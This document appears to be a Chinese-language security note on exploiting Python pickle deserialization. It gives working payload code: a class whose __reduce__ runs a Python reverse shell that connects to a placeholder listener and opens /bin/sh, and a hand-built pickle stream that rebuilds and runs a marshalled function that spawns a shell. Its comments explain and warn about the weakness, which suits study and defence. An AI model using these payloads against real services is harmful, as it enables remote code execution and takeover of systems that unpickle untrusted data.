pickle反序列化执行代码反弹 shell
  • 使用 __reduce__ 魔术方法执行：pickle.loads 在重建对象时会直接调用 __reduce__ 返回的可调用对象及其参数元组，因此对不可信数据做 pickle 反序列化等同于远程代码执行
import pickle
import os
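class A(object):
    """Pickle payload: deserializing an instance runs a reverse shell.

    ``pickle.loads`` rebuilds an object by calling whatever ``__reduce__`` returns
    (a callable plus its argument tuple).  Returning ``(os.system, (cmd,))`` makes
    the *loading* process execute ``cmd`` -- which is exactly why ``pickle`` must
    never be used on untrusted input.

    The connect-back target comes from the ``HOST``/``PORT`` class attributes or
    the optional constructor arguments, so the class can be pointed at a listener
    without editing the command string.  Defaults reproduce the original
    placeholder target.
    """

    HOST = "xxx.xxx.xxx.xxx"
    PORT = 9999

    # One-liner reverse shell: connect back, dup the socket over stdin/stdout/
    # stderr, then hand over an interactive /bin/sh.  Rendered with %s so the
    # default output is byte-identical to the original hard-coded command.
    _PAYLOAD = (
        "python -c 'import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        "s.connect((\"%s\",%s));"
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        "p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    )

    def __init__(self, host=None, port=None):
        """Optionally override the listener; ``None`` keeps the class default."""
        self.host = self.HOST if host is None else host
        self.port = self.PORT if port is None else port

    def __reduce__(self):
        """Return ``(os.system, (command,))`` -- the callable pickle invokes on load.

        Only the callable and its arguments are serialized; the instance itself
        never reaches the other side.
        """
        return (os.system, (self._PAYLOAD % (self.host, self.port),))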
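if __name__ == "__main__":
    # Demo only: pickle our own object and immediately load it back.  The
    # os.system payload fires inside pickle.loads, i.e. in whichever process
    # deserializes the bytes -- on a target that is the victim, here it is us.
    # Guarded by __main__ so merely importing this file does not launch the shell.
    a = A()
    result = pickle.dumps(a)
    # NOTE: pickle.loads on data you did not produce yourself is code execution.
    pickle.loads(result)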
  • 使用 marshal 序列化自定义函数的代码对象，并在 pickle 流中用 types.FunctionType 重建函数对象后调用执行（注意：marshal 格式与 Python 解释器版本绑定，生成端与目标端的版本需一致，否则 marshal.loads 会失败）
import pickle
import marshal
import base64

def foo():
    """Payload body that gets marshalled and embedded in the pickle stream.

    Only this function's code object is serialized below
    (``marshal.dumps(foo.func_code)``), which is presumably why the ``os``
    import sits inside the body rather than at module level.  Prints a small
    fib demo, then hands the calling process an interactive shell.
    Python 2 syntax (print statement, func_code).
    """
    import os

    def fib(n):
        # Naive recursive Fibonacci; trivially cheap for n = 10.
        if n > 1:
            return fib(n - 1) + fib(n - 2)
        return n

    print 'fib(10) =', fib(10)
    os.system('/bin/sh')  # interactive shell in the deserializing process

# Marshal the payload's code object and base64 it so it can be pasted into a
# text pickle stream as an S'...' string.
marshalled_code = marshal.dumps(foo.func_code)
code_serialized = base64.b64encode(marshalled_code)
print code_serialized


import marshal
import base64

def foo():
    """Placeholder payload: replace the body with the code to embed.

    The pickle stream printed below serializes this function's code object and
    calls the rebuilt function, so whatever goes here runs at load time.
    """
    return None

# Protocol-0 pickle that rebuilds and calls ``foo`` on the loading side:
#   c types FunctionType      -> push types.FunctionType   ('c' opcode + module 'types', not ctypes)
#   ( c marshal loads         -> MARK, push marshal.loads
#   ( c base64 b64decode      -> MARK, push base64.b64decode
#   ( S'<b64>' t R            -> b64decode(b64)          -> marshal bytes
#   t R                       -> marshal.loads(bytes)    -> code object
#   c __builtin__ globals ( t R -> globals()
#   S'' t R                   -> FunctionType(code, globals(), '')
#   ( t R .                   -> call the new function, STOP
# The marshal blob is interpreter-version specific; generate it with the same
# Python version that will load the pickle.
pickle_template = (
    "ctypes\nFunctionType\n"
    "(cmarshal\nloads\n"
    "(cbase64\nb64decode\n"
    "(S'%s'\n"
    "tRtRc__builtin__\nglobals\n"
    "(tRS''\n"
    "tR(tR."
)
encoded_code = base64.b64encode(marshal.dumps(foo.func_code))
print pickle_template % encoded_code

